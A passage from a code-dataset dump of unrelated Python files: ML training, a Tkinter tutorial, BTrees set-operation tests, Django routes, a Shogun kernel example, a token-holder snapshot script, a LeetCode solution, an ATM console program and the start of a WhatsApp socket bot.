= {sample_input: feed})\n feed = np.expand_dims(np.random.choice(xrange(vocabulary_size), p=prediction.ravel()),axis=0)\n sentence += unichr(feed)\n\n print(sentence)\n end = time.time()\n\n print('='*100)\n print('Sampling time = ', end - start)\n\n # save samples\n sample_dir = os.path.join('sample_logs',timestamp)\n\n if not os.path.exists(sample_dir):\n os.makedirs(sample_dir)\n sample_file = os.path.join(sample_dir,'samples')\n\n with io.open(sample_file, 'a+', encoding='utf-8') as f:\n f.write('\\n' + 'GLOBAL_STEP: ' + str(gs) + '\\n' + sentence)\n\n # save the fully trained model on the way out\n save_dir = os.path.join(args.saved_models_dir,timestamp)\n os.makedirs(save_dir)\n checkpoint_path = os.path.join(save_dir, 'model')\n saver.save(session, checkpoint_path, global_step=gs)\n print('Model Saved')\n","sub_path":"train_mLSTM.py","file_name":"train_mLSTM.py","file_ext":"py","file_size_in_byte":16816,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"256393587","text":"\"\"\"\r\nTitle: tutorial_3.py\r\nDate: 9/24/2019\r\nCreated by: Kristopher Ward\r\nRevisions:\r\n\r\nPurpose:\r\n To teach basic tKinter\r\n\"\"\"\r\n\r\n# libraries\r\nimport tkinter as tk\r\n\r\nclass myGUI:\r\n def __init__(self):\r\n self.master = tk.Tk()\r\n\r\n self.button = tk.Button(self.master, text=\"button1\", bg=\"blue\", fg=\"white\", command=self.func_button_1)\r\n self.button.pack()\r\n self.button_2 = tk.Button(self.master, text=\"button2\", bg=\"red\", command=self.func_button_2)\r\n self.button_2.pack()\r\n def func_button_1(self):\r\n print(\"I am button 1\")\r\n def func_button_2(self):\r\n print(\"I am not button 1 but I'm button 2\")\r\n\r\nif __name__ == \"__main__\":\r\n myWindow = myGUI()\r\n myWindow.master.mainloop()\r\n","sub_path":"tutorial_3.py","file_name":"tutorial_3.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"168598151","text":"##############################################################################\n#\n# Copyright (c) 2002 Zope Corporation and Contributors.\n# All Rights Reserved.\n#\n# This software is subject to the provisions of the Zope Public License,\n# Version 2.0 (ZPL). A copy of the ZPL should accompany this distribution.\n# THIS SOFTWARE IS PROVIDED \"AS IS\" AND ANY AND ALL EXPRESS OR IMPLIED\n# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS\n# FOR A PARTICULAR PURPOSE\n#\n##############################################################################\nimport random\nfrom unittest import TestCase, TestSuite, TextTestRunner, makeSuite\n\nfrom BTrees.OOBTree import OOBTree, OOBucket, OOSet, OOTreeSet\nfrom BTrees.IOBTree import IOBTree, IOBucket, IOSet, IOTreeSet\nfrom BTrees.IIBTree import IIBTree, IIBucket, IISet, IITreeSet\nfrom BTrees.OIBTree import OIBTree, OIBucket, OISet, OITreeSet\n\n# Subclasses have to set up:\n# builders - functions to build inputs, taking an optional keys arg\n# intersection, union, difference - set to the type-correct versions\nclass SetResult(TestCase):\n def setUp(self):\n self.Akeys = [1, 3, 5, 6 ]\n self.Bkeys = [ 2, 3, 4, 6, 7]\n self.As = [makeset(self.Akeys) for makeset in self.builders]\n self.Bs = [makeset(self.Bkeys) for makeset in self.builders]\n self.emptys = [makeset() for makeset in self.builders]\n\n # Slow but obviously correct Python implementations of basic ops.\n def _union(self, x, y):\n result = list(x.keys())\n for e in y.keys():\n if e not in result:\n result.append(e)\n result.sort()\n return result\n\n def _intersection(self, x, y):\n result = []\n ykeys = y.keys()\n for e in x.keys():\n if e in ykeys:\n result.append(e)\n return result\n\n def _difference(self, x, y):\n result = list(x.keys())\n for e in y.keys():\n if e in result:\n result.remove(e)\n # Difference preserves LHS values.\n if hasattr(x, \"values\"):\n result = [(k, x[k]) for k in result]\n return result\n\n def testNone(self):\n for op in self.union, self.intersection, self.difference:\n C = op(None, None)\n self.assert_(C is None)\n\n for op in self.union, self.intersection, self.difference:\n for A in self.As:\n C = op(A, None)\n self.assert_(C is A)\n\n C = op(None, A)\n if op is self.difference:\n self.assert_(C is None)\n else:\n self.assert_(C is A)\n\n def testEmptyUnion(self):\n for A in self.As:\n for E in self.emptys:\n C = self.union(A, E)\n self.assert_(not hasattr(C, \"values\"))\n self.assertEqual(list(C), self.Akeys)\n\n C = self.union(E, A)\n self.assert_(not hasattr(C, \"values\"))\n self.assertEqual(list(C), self.Akeys)\n\n def testEmptyIntersection(self):\n for A in self.As:\n for E in self.emptys:\n C = self.intersection(A, E)\n self.assert_(not hasattr(C, \"values\"))\n self.assertEqual(list(C), [])\n\n C = self.intersection(E, A)\n self.assert_(not hasattr(C, \"values\"))\n self.assertEqual(list(C), [])\n\n def testEmptyDifference(self):\n for A in self.As:\n for E in self.emptys:\n C = self.difference(A, E)\n # Difference preserves LHS values.\n self.assertEqual(hasattr(C, \"values\"), hasattr(A, \"values\"))\n if hasattr(A, \"values\"):\n self.assertEqual(list(C.items()), list(A.items()))\n else:\n self.assertEqual(list(C), self.Akeys)\n\n C = self.difference(E, A)\n self.assertEqual(hasattr(C, \"values\"), hasattr(E, \"values\"))\n self.assertEqual(list(C.keys()), [])\n\n def testUnion(self):\n inputs = self.As + self.Bs\n for A in inputs:\n for B in inputs:\n C = self.union(A, B)\n self.assert_(not hasattr(C, \"values\"))\n self.assertEqual(list(C), self._union(A, B))\n\n def testIntersection(self):\n inputs = self.As + self.Bs\n for A in inputs:\n for B in inputs:\n C = self.intersection(A, B)\n self.assert_(not hasattr(C, \"values\"))\n self.assertEqual(list(C), self._intersection(A, B))\n\n def testDifference(self):\n inputs = self.As + self.Bs\n for A in inputs:\n for B in inputs:\n C = self.difference(A, B)\n # Difference preserves LHS values.\n self.assertEqual(hasattr(C, \"values\"), hasattr(A, \"values\"))\n want = self._difference(A, B)\n if hasattr(A, \"values\"):\n self.assertEqual(list(C.items()), want)\n else:\n self.assertEqual(list(C), want)\n\n def testLargerInputs(self):\n from random import randint\n MAXSIZE = 200\n MAXVAL = 400\n for i in range(3):\n n = randint(0, MAXSIZE)\n Akeys = [randint(1, MAXVAL) for j in range(n)]\n As = [makeset(Akeys) for makeset in self.builders]\n Akeys = IISet(Akeys)\n\n n = randint(0, MAXSIZE)\n Bkeys = [randint(1, MAXVAL) for j in range(n)]\n Bs = [makeset(Bkeys) for makeset in self.builders]\n Bkeys = IISet(Bkeys)\n\n for op, simulator in ((self.union, self._union),\n (self.intersection, self._intersection),\n (self.difference, self._difference)):\n for A in As:\n for B in Bs:\n got = op(A, B)\n want = simulator(Akeys, Bkeys)\n self.assertEqual(list(got.keys()), want,\n (A, B,\n Akeys, Bkeys,\n list(got.keys()), want))\n\n# Given a mapping builder (IIBTree, OOBucket, etc), return a function\n# that builds an object of that type given only a list of keys.\ndef makeBuilder(mapbuilder):\n def result(keys=[], mapbuilder=mapbuilder):\n return mapbuilder(zip(keys, keys))\n return result\n\nclass PureII(SetResult):\n from BTrees.IIBTree import union, intersection, difference\n builders = IISet, IITreeSet, makeBuilder(IIBTree), makeBuilder(IIBucket)\n\nclass PureIO(SetResult):\n from BTrees.IOBTree import union, intersection, difference\n builders = IOSet, IOTreeSet, makeBuilder(IOBTree), makeBuilder(IOBucket)\n\nclass PureOO(SetResult):\n from BTrees.OOBTree import union, intersection, difference\n builders = OOSet, OOTreeSet, makeBuilder(OOBTree), makeBuilder(OOBucket)\n\nclass PureOI(SetResult):\n from BTrees.OIBTree import union, intersection, difference\n builders = OISet, OITreeSet, makeBuilder(OIBTree), makeBuilder(OIBucket)\n\n# Subclasses must set up (as class variables):\n# multiunion, union\n# mkset, mktreeset\n# mkbucket, mkbtree\nclass MultiUnion(TestCase):\n\n def testEmpty(self):\n self.assertEqual(len(self.multiunion([])), 0)\n\n def testOne(self):\n for sequence in [3], range(20), range(-10, 0, 2) + range(1, 10, 2):\n seq1 = sequence[:]\n seq2 = sequence[:]\n seq2.reverse()\n seqsorted = sequence[:]\n seqsorted.sort()\n for seq in seq1, seq2, seqsorted:\n for builder in self.mkset, self.mktreeset:\n input = builder(seq)\n output = self.multiunion([input])\n self.assertEqual(len(seq), len(output))\n self.assertEqual(seqsorted, list(output))\n\n def testValuesIgnored(self):\n for builder in self.mkbucket, self.mkbtree:\n input = builder([(1, 2), (3, 4), (5, 6)])\n output = self.multiunion([input])\n self.assertEqual([1, 3, 5], list(output))\n\n def testBigInput(self):\n N = 100000\n input = self.mkset(range(N))\n output = self.multiunion([input] * 10)\n self.assertEqual(len(output), N)\n self.assertEqual(output.minKey(), 0)\n self.assertEqual(output.maxKey(), N-1)\n self.assertEqual(list(output), range(N))\n\n def testLotsOfLittleOnes(self):\n from random import shuffle\n N = 5000\n inputs = []\n mkset, mktreeset = self.mkset, self.mktreeset\n for i in range(N):\n base = i * 4 - N\n inputs.append(mkset([base, base+1]))\n inputs.append(mktreeset([base+2, base+3]))\n shuffle(inputs)\n output = self.multiunion(inputs)\n self.assertEqual(len(output), N*4)\n self.assertEqual(list(output), range(-N, 3*N))\n\n def testFunkyKeyIteration(self):\n # The internal set iteration protocol allows \"iterating over\" a\n # a single key as if it were a set.\n N = 100\n union, mkset = self.union, self.mkset\n slow = mkset()\n for i in range(N):\n slow = union(slow, mkset([i]))\n fast = self.multiunion(range(N)) # acts like N distinct singleton sets\n self.assertEqual(len(slow), N)\n self.assertEqual(len(fast), N)\n self.assertEqual(list(slow.keys()), list(fast.keys()))\n self.assertEqual(list(fast.keys()), range(N))\n\nclass TestIIMultiUnion(MultiUnion):\n from BTrees.IIBTree import multiunion, union\n from BTrees.IIBTree import IISet as mkset, IITreeSet as mktreeset\n from BTrees.IIBTree import IIBucket as mkbucket, IIBTree as mkbtree\n\nclass TestIOMultiUnion(MultiUnion):\n from BTrees.IOBTree import multiunion, union\n from BTrees.IOBTree import IOSet as mkset, IOTreeSet as mktreeset\n from BTrees.IOBTree import IOBucket as mkbucket, IOBTree as mkbtree\n\n# Check that various special module functions are and aren't imported from\n# the expected BTree modules.\nclass TestImports(TestCase):\n def testWeightedUnion(self):\n from BTrees.IIBTree import weightedUnion\n from BTrees.OIBTree import weightedUnion\n\n try:\n from BTrees.IOBTree import weightedUnion\n except ImportError:\n pass\n else:\n self.fail(\"IOBTree shouldn't have weightedUnion\")\n\n try:\n from BTrees.OOBTree import weightedUnion\n except ImportError:\n pass\n else:\n self.fail(\"OOBTree shouldn't have weightedUnion\")\n\n def testWeightedIntersection(self):\n from BTrees.IIBTree import weightedIntersection\n from BTrees.OIBTree import weightedIntersection\n\n try:\n from BTrees.IOBTree import weightedIntersection\n except ImportError:\n pass\n else:\n self.fail(\"IOBTree shouldn't have weightedIntersection\")\n\n try:\n from BTrees.OOBTree import weightedIntersection\n except ImportError:\n pass\n else:\n self.fail(\"OOBTree shouldn't have weightedIntersection\")\n\n\n def testMultiunion(self):\n from BTrees.IIBTree import multiunion\n from BTrees.IOBTree import multiunion\n\n try:\n from BTrees.OIBTree import multiunion\n except ImportError:\n pass\n else:\n self.fail(\"OIBTree shouldn't have multiunion\")\n\n try:\n from BTrees.OOBTree import multiunion\n except ImportError:\n pass\n else:\n self.fail(\"OOBTree shouldn't have multiunion\")\n\n# Subclasses must set up (as class variables):\n# weightedUnion, weightedIntersection\n# builders -- sequence of constructors, taking items\n# union, intersection -- the module routines of those names\n# mkbucket -- the module bucket builder\nclass Weighted(TestCase):\n\n def setUp(self):\n self.Aitems = [(1, 10), (3, 30), (5, 50), (6, 60)]\n self.Bitems = [(2, 21), (3, 31), (4, 41), (6, 61), (7, 71)]\n\n self.As = [make(self.Aitems) for make in self.builders]\n self.Bs = [make(self.Bitems) for make in self.builders]\n self.emptys = [make([]) for make in self.builders]\n\n weights = []\n for w1 in -3, -1, 0, 1, 7:\n for w2 in -3, -1, 0, 1, 7:\n weights.append((w1, w2))\n self.weights = weights\n\n def testBothNone(self):\n for op in self.weightedUnion, self.weightedIntersection:\n w, C = op(None, None)\n self.assert_(C is None)\n self.assertEqual(w, 0)\n\n w, C = op(None, None, 42, 666)\n self.assert_(C is None)\n self.assertEqual(w, 0)\n\n def testLeftNone(self):\n for op in self.weightedUnion, self.weightedIntersection:\n for A in self.As + self.emptys:\n w, C = op(None, A)\n self.assert_(C is A)\n self.assertEqual(w, 1)\n\n w, C = op(None, A, 42, 666)\n self.assert_(C is A)\n self.assertEqual(w, 666)\n\n def testRightNone(self):\n for op in self.weightedUnion, self.weightedIntersection:\n for A in self.As + self.emptys:\n w, C = op(A, None)\n self.assert_(C is A)\n self.assertEqual(w, 1)\n\n w, C = op(A, None, 42, 666)\n self.assert_(C is A)\n self.assertEqual(w, 42)\n\n # If obj is a set, return a bucket with values all 1; else return obj.\n def _normalize(self, obj):\n if isaset(obj):\n obj = self.mkbucket(zip(obj.keys(), [1] * len(obj)))\n return obj\n\n # Python simulation of weightedUnion.\n def _wunion(self, A, B, w1=1, w2=1):\n if isaset(A) and isaset(B):\n return 1, self.union(A, B).keys()\n A = self._normalize(A)\n B = self._normalize(B)\n result = []\n for key in self.union(A, B):\n v1 = A.get(key, 0)\n v2 = B.get(key, 0)\n result.append((key, v1*w1 + v2*w2))\n return 1, result\n\n def testUnion(self):\n inputs = self.As + self.Bs + self.emptys\n for A in inputs:\n for B in inputs:\n want_w, want_s = self._wunion(A, B)\n got_w, got_s = self.weightedUnion(A, B)\n self.assertEqual(got_w, want_w)\n if isaset(got_s):\n self.assertEqual(got_s.keys(), want_s)\n else:\n self.assertEqual(got_s.items(), want_s)\n\n for w1, w2 in self.weights:\n want_w, want_s = self._wunion(A, B, w1, w2)\n got_w, got_s = self.weightedUnion(A, B, w1, w2)\n self.assertEqual(got_w, want_w)\n if isaset(got_s):\n self.assertEqual(got_s.keys(), want_s)\n else:\n self.assertEqual(got_s.items(), want_s)\n\n # Python simulation weightedIntersection.\n def _wintersection(self, A, B, w1=1, w2=1):\n if isaset(A) and isaset(B):\n return w1 + w2, self.intersection(A, B).keys()\n A = self._normalize(A)\n B = self._normalize(B)\n result = []\n for key in self.intersection(A, B):\n result.append((key, A[key]*w1 + B[key]*w2))\n return 1, result\n\n def testIntersection(self):\n inputs = self.As + self.Bs + self.emptys\n for A in inputs:\n for B in inputs:\n want_w, want_s = self._wintersection(A, B)\n got_w, got_s = self.weightedIntersection(A, B)\n self.assertEqual(got_w, want_w)\n if isaset(got_s):\n self.assertEqual(got_s.keys(), want_s)\n else:\n self.assertEqual(got_s.items(), want_s)\n\n for w1, w2 in self.weights:\n want_w, want_s = self._wintersection(A, B, w1, w2)\n got_w, got_s = self.weightedIntersection(A, B, w1, w2)\n self.assertEqual(got_w, want_w)\n if isaset(got_s):\n self.assertEqual(got_s.keys(), want_s)\n else:\n self.assertEqual(got_s.items(), want_s)\n\n# Given a set builder (like OITreeSet or OISet), return a function that\n# takes a list of (key, value) pairs and builds a set out of the keys.\ndef itemsToSet(setbuilder):\n def result(items, setbuilder=setbuilder):\n return setbuilder([key for key, value in items])\n return result\n\n# 'thing' is a bucket, btree, set or treeset. Return true iff it's one of the\n# latter two.\ndef isaset(thing):\n return not hasattr(thing, 'values')\n\nclass TestWeightedII(Weighted):\n from BTrees.IIBTree import weightedUnion, weightedIntersection\n from BTrees.IIBTree import union, intersection\n from BTrees.IIBTree import IIBucket as mkbucket\n builders = IIBucket, IIBTree, itemsToSet(IISet), itemsToSet(IITreeSet)\n\nclass TestWeightedOI(Weighted):\n from BTrees.OIBTree import weightedUnion, weightedIntersection\n from BTrees.OIBTree import union, intersection\n from BTrees.OIBTree import OIBucket as mkbucket\n builders = OIBucket, OIBTree, itemsToSet(OISet), itemsToSet(OITreeSet)\n\n\ndef test_suite():\n s = TestSuite()\n for klass in (TestIIMultiUnion, TestIOMultiUnion,\n TestImports,\n PureII, PureIO, PureOI, PureOO,\n TestWeightedII, TestWeightedOI):\n s.addTest(makeSuite(klass))\n return s\n\ndef main():\n TextTestRunner().run(test_suite())\n\nif __name__ == '__main__':\n main()\n","sub_path":"lib/python/BTrees/tests/testSetOps.py","file_name":"testSetOps.py","file_ext":"py","file_size_in_byte":17887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"299994291","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('insert/', views.insertDB, name='insertDB'),\n path('view/', views.viewDB, name='viewDB'),\n path('delete/', views.delete, name='deleteDB'),\n path('edit/', views.edit, name='editDB'),\n\n]\n","sub_path":"database/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"173135728","text":"# SimpleLocalityImprovedString kernel, is a ``simplified'' and better performing version of the Locality improved kernel.\n\nfrom tools.load import LoadMatrix\nfrom sg import sg\nlm=LoadMatrix()\n\ntraindna=lm.load_dna('../data/fm_train_dna.dat')\ntestdna=lm.load_dna('../data/fm_test_dna.dat')\ntrainlabel=lm.load_labels('../data/label_train_dna.dat')\nparameter_list=[[traindna,testdna,trainlabel,10,5,5,7],\n\t\t[traindna,testdna,trainlabel,11,6,6,8]]\n\ndef kernel_simplelocalityimprovedstring (fm_train_dna=traindna,fm_test_dna=testdna,\n\t\t\t\t label_train_dna=trainlabel,size_cache=10,\n\t\t\t\t length=5,inner_degree=5,outer_degree=7):\n\n\tsg('set_features', 'TRAIN', fm_train_dna, 'DNA')\n\tsg('set_features', 'TEST', fm_test_dna, 'DNA')\n\tsg('set_kernel', 'SLIK', 'CHAR', size_cache, length, inner_degree, outer_degree)\n\tkm=sg('get_kernel_matrix', 'TRAIN')\n\tkm=sg('get_kernel_matrix', 'TEST')\n\treturn km\n\nif __name__=='__main__':\n\tprint('SimpleLocalityImprovedString')\n\tkernel_simplelocalityimprovedstring(*parameter_list[0])\n","sub_path":"build/shogun_lib/examples/documented/python_static/kernel_simplelocalityimprovedstring.py","file_name":"kernel_simplelocalityimprovedstring.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"168995516","text":"import json\nfrom collections import Counter, defaultdict\nfrom concurrent.futures import ThreadPoolExecutor\nfrom datetime import datetime, timedelta, timezone\nfrom fractions import Fraction\nfrom glob import glob\nfrom itertools import count\n\nfrom brownie import Contract, chain, interface, web3\nfrom camera_shy import uniswap_v3\nfrom camera_shy.common import (\n block_after_timestamp,\n decode_logs,\n get_code,\n get_token_transfers,\n transfers_to_balances,\n unwrap_balances,\n)\nfrom click import secho\nfrom toolz import concat, groupby, valmap\nfrom tqdm import tqdm\n\nSNAPSHOT_START = datetime(2021, 5, 12, tzinfo=timezone.utc)\nSNAPSHOT_INTERVAL = timedelta(days=7)\nMIN_BALANCE = 2000 * 10 ** 12\nCHAINS = {\n 1: {\n \"network\": \"eth\",\n \"woofy\": \"0xD0660cD418a64a1d44E9214ad8e459324D8157f1\",\n \"deploy_block\": 12414993,\n },\n 250: {\n \"network\": \"ftm\",\n \"woofy\": \"0xD0660cD418a64a1d44E9214ad8e459324D8157f1\",\n \"deploy_block\": 6146773,\n },\n 56: {\n \"network\": \"bsc\",\n \"woofy\": \"0xD0660cD418a64a1d44E9214ad8e459324D8157f1\",\n \"deploy_block\": 7363975,\n },\n 137: {\n \"network\": \"matic\",\n \"woofy\": \"0xD0660cD418a64a1d44E9214ad8e459324D8157f1\",\n \"deploy_block\": 14604154,\n },\n}\nUNISWAP_V3_FACTORY = \"0x1F98431c8aD98523631AE4a59f267346ea31F984\"\nCHAIN = CHAINS[chain.id]\nWOOFY = CHAIN[\"woofy\"]\nDEPLOY_BLOCK = CHAIN[\"deploy_block\"]\n\n\ndef generate_snapshot_blocks(start, interval):\n \"\"\"\n Generate snapshot block numbers at a certain interval.\n \"\"\"\n epochs = {}\n for period in count():\n timestamp = start + interval * period\n if timestamp > datetime.now(tz=timezone.utc):\n break\n\n block = block_after_timestamp(timestamp)\n print(f\"{timestamp} -> {block}\")\n epochs[str(timestamp)] = block\n\n return epochs\n\n\ndef unwrap_uniswap_v3(snapshot, block):\n secho(\"Fetch Uniswap v3 Positions\", fg=\"yellow\")\n uniswap_v3_positions = uniswap_v3.fetch_uniswap_v3_positions(block)\n\n secho(f\"Looking for Uniswap v3 Pools\", fg=\"yellow\")\n uniswap_pools = [\n user for user in tqdm(snapshot) if uniswap_v3.is_uniswap_v3_pool(user)\n ]\n secho(f\"Found {len(uniswap_pools)} Uniswap v3 Pools\", fg=\"yellow\")\n\n replacements = {}\n for pool in uniswap_pools:\n replacements[pool] = uniswap_v3.unwrap_liquidity(\n interface.IUniswapV3Pool(pool),\n Contract(WOOFY),\n uniswap_v3_positions,\n block,\n MIN_BALANCE,\n )\n return replacements\n\n\ndef unwrap_lp_tokens(snapshot, block, min_balance=0):\n codes = list(ThreadPoolExecutor().map(get_code, snapshot))\n contracts = [addr for addr, code in zip(snapshot, codes) if code]\n replacements = {}\n\n for pool in tqdm(contracts, desc=\"identify pools\"):\n try:\n factory = interface.IUniswapV2Pair(pool).factory()\n except ValueError:\n continue\n\n secho(f\"Unwrapping LP {pool} => {factory}\", fg=\"yellow\")\n logs = get_token_transfers(pool, DEPLOY_BLOCK)\n events = decode_logs(list(logs))\n balances = transfers_to_balances(events, block)\n supply = sum(balances.values())\n if not supply:\n continue\n replacements[pool] = {\n user: int(Fraction(balances[user], supply) * snapshot[pool])\n for user in balances\n }\n replacements[pool] = {\n user: balance\n for user, balance in replacements[pool].items()\n if balance >= min_balance\n }\n print(replacements)\n\n return replacements\n\n\ndef main():\n epochs = generate_snapshot_blocks(SNAPSHOT_START, SNAPSHOT_INTERVAL)\n secho(\"Fetch Transfer logs\", fg=\"yellow\")\n logs = get_token_transfers(WOOFY, DEPLOY_BLOCK)\n events = decode_logs(list(logs))\n\n secho(\"Photograph balances at each snapshot block\", fg=\"yellow\")\n snapshots = {\n epoch: transfers_to_balances(events, block, MIN_BALANCE)\n for epoch, block in epochs.items()\n }\n\n secho(\"Check addresses for being LP contracts\", fg=\"yellow\")\n print(valmap(len, snapshots))\n unique = set(concat(snapshots.values()))\n print(len(unique), \"uniques\")\n\n for epoch, block in epochs.items():\n secho(f\"{epoch} Unwrap LP contracts\", fg=\"yellow\")\n\n print(\"before\", len(snapshots[epoch]))\n replacements = {}\n\n replacements.update(unwrap_lp_tokens(snapshots[epoch], block, MIN_BALANCE))\n\n if chain.id == 1:\n replacements.update(unwrap_uniswap_v3(snapshots[epoch], block))\n\n print(\"repl\", replacements)\n snapshots[epoch] = unwrap_balances(snapshots[epoch], replacements)\n print(\"after\", len(snapshots[epoch]))\n\n with open(f\"snapshots/01-balances-{chain.id}.json\", \"wt\") as f:\n json.dump(snapshots, f, indent=2)\n\n\ndef combine():\n combined_balances = defaultdict(Counter)\n\n # balances from all networks are combined\n sources = [json.load(open(f)) for f in glob(\"snapshots/01-*.json\")]\n for source in sources:\n for epoch in source:\n for user, balance in source[epoch].items():\n combined_balances[epoch][user] += balance\n\n # each epoch where you had at least min balance adds a single chance\n chances = Counter()\n for epoch in combined_balances:\n for user in combined_balances[epoch]:\n assert combined_balances[epoch][user] >= MIN_BALANCE\n chances[user] += 1\n\n with open(f\"snapshots/02-chances.json\", \"wt\") as f:\n json.dump(dict(chances.most_common()), f, indent=2)\n\n secho(\"chances distributions\", fg=\"yellow\")\n for a, b in sorted(valmap(len, groupby(chances.get, chances)).items()):\n print(f\"{a} {b}\")\n\n secho(\"unique users\", fg=\"yellow\")\n print(len(chances))\n","sub_path":"scripts/snapshot.py","file_name":"snapshot.py","file_ext":"py","file_size_in_byte":5819,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"281986213","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Author : Mike\n# @Contact : 597290963@qq.com\n# @Time : 2021/2/13 7:51\n# @File : MaxProduct.py\nfrom typing import List\n\n\"\"\"\n给你一个整数数组 nums ,请你找出数组中乘积最大的连续子数组(该子数组中至少包含一个数字),并返回该子数组所对应的乘积。\n\"\"\"\n\n\nclass Solution:\n\n def maxProduct(self, nums: List[int]) -> int:\n if not nums:\n return\n\n res = nums[0]\n max_res = nums[0]\n min_res = nums[0]\n for i in range(1, len(nums)):\n cur_max = max(min_res * nums[i], nums[i], max_res * nums[i])\n cur_min = min(min_res * nums[i], nums[i], max_res * nums[i])\n res = max(res, cur_max)\n max_res = cur_max\n min_res = cur_min\n\n return res\n\n\nif __name__ == '__main__':\n print(Solution().maxProduct([-4, -3, -2]))\n","sub_path":"datastructure/dp_exercise/MaxProduct.py","file_name":"MaxProduct.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"373676171","text":"import datetime\r\n\r\n\r\ndef accountAvailability(newAccount):\r\n with open('accounts.txt','r') as f:\r\n if str(newAccount) in f.read():\r\n return False\r\n\r\ndef createAccount():\r\n accountAvailable = False\r\n while accountAvailable == False:\r\n while True:\r\n try:\r\n newAccount = int(input('Enter your 6-digit account number> '))\r\n break\r\n except ValueError:\r\n print(\"Oops! That was no valid number. Try again...\")\r\n accountAvailable = accountAvailability(newAccount)\r\n if accountAvailable == False:\r\n print('Account number already in use.')\r\n with open('accounts.txt','a') as f:\r\n f.write(f'{newAccount} 0\\n')\r\n print(f'Account {newAccount} created successfully.')\r\n \r\ndef gotoMainmenu():\r\n while True:\r\n while True:\r\n try:\r\n entry = int(input('****MAIN MENU****\\n1. Create account\\n2. Login\\n3. End session\\n> '))\r\n break\r\n except ValueError:\r\n print(\"Oops! That was no valid number. Try again...\")\r\n if entry == 1:\r\n createAccount()\r\n if entry == 2:\r\n while True:\r\n try:\r\n login = int(input('login(account number)> '))\r\n break\r\n except ValueError:\r\n print(\"Account number invalid.\")\r\n else:\r\n with open('accounts.txt','r') as f:\r\n if login in f.read():\r\n print('login successfull. Welcome!')\r\n gotoAccountmenu(login)\r\n if entry == 3:\r\n print('Session ended. Please come again.')\r\n break\r\n\r\ndef getbalancefromfile(accountNumber):\r\n with open('accounts.txt','r') as f:\r\n data = f.readlines()\r\n for line in data:\r\n if line.__contains__(str(accountNumber)):\r\n accountInfo=line\r\n balance=int(accountInfo.split(\" \")[1])\r\n return balance\r\n \r\ndef updateBalanceinFile(accountNumber, oldBalance, newBalance):\r\n with open('accounts.txt','r') as f:\r\n data = f.read()\r\n data = data.replace (f'{accountNumber} {oldBalance}', f'{accountNumber} {newBalance}')\r\n with open('accounts.txt','w') as f:\r\n f.write(data)\r\n \r\ndef loggTransaction(type, account, amount):\r\n if type == 'deposit':\r\n with open('transactions.txt','a') as f:\r\n timeNow = datetime.datetime.now()\r\n f.write(f'{timeNow.strftime(\"%c\")} > account = {account} > deposit > {amount} kr\\n')\r\n elif type == 'withdrawal':\r\n with open('transactions.txt','a') as f:\r\n timeNow = datetime.datetime.now()\r\n f.write(f'{timeNow.strftime(\"%c\")} > account = {account} > withdrawal > {amount} kr\\n')\r\n\r\ndef gotoAccountmenu(login):\r\n while True:\r\n while True:\r\n try:\r\n entry2 = int(input('****ACCOUNT MENU****\\n1. Withdrawal\\n2. Deposit\\n3. Current balance\\n4. Back to main menu\\n> '))\r\n break\r\n except ValueError:\r\n print(\"Oops! That was no valid number. Try again...\")\r\n if entry2 == 1:\r\n while True:\r\n try:\r\n withdrawal = int(input('Amount to withdraw> '))\r\n break\r\n except ValueError:\r\n print(\"Oops! That was no valid number. Try again...\")\r\n currentBalance = getbalancefromfile(login)\r\n if currentBalance < withdrawal:\r\n print('Your balance is too low.')\r\n else:\r\n newbalance = currentBalance - withdrawal\r\n updateBalanceinFile(login, currentBalance, newbalance)\r\n loggTransaction('withdrawal', login, withdrawal)\r\n print('Withdrawal complete.')\r\n if entry2 == 2:\r\n while True:\r\n try:\r\n deposit = int(input('Amount to deposit> '))\r\n break\r\n except ValueError:\r\n print(\"Oops! That was no valid number. Try again...\")\r\n currentBalance = getbalancefromfile(login)\r\n newbalance = currentBalance + deposit\r\n updateBalanceinFile(login, currentBalance, newbalance)\r\n loggTransaction('deposit', login, deposit)\r\n print('Deposit complete.')\r\n if entry2 == 3:\r\n print(f'Your balance is: {getbalancefromfile(login)} SEK')\r\n if entry2 == 4:\r\n break\r\n\r\ngotoMainmenu()","sub_path":"Bankomat_VG/Bankomat_liveuppdateringtextfil.py","file_name":"Bankomat_liveuppdateringtextfil.py","file_ext":"py","file_size_in_byte":4666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"4358299","text":"from socketIO_client_nexus import SocketIO, LoggingNamespace\nfrom config import token,ip,pathSource,selemiunIP\nfrom Utils.logs import write_log\nimport os, sys, time, json\nimport shutil\nimport traceback\nfrom webwhatsapi import WhatsAPIDriver\nfrom webwhatsapi.objects.message import Message, MediaMessage\nimport shutil\nfrom uuid import uuid4\nfrom threading import Thread\n\n##### Setting for start ######\nprofiledir=os.path.join(\".\",\"firefox_cache_v2\")\nif not os.path.exists(profiledir): os.makedirs(profiledir)\n\nsocketIO = SocketIO(ip,3000, LoggingNamespace)\nwsp = None\ndriver = None\nawaitLogin = None\n\n#####################################\n# Functions Auth #\n#####################################\ndef on_connect(*args):\n write_log('Socket-Info','Connection whit server')\n socketIO.emit('Auth',token)\n\ndef on_welcome(*args):\n try:\n global driver\n write_log('Socket-Info','Connection success')\n # In case of reconnect #\n if driver != None and driver.is_logged_in():\n # Send account info #\n _wsp = {}\n _wsp['whatsAppJoin'] = driver.is_logged_in()\n _wsp['bateryLevel'] = 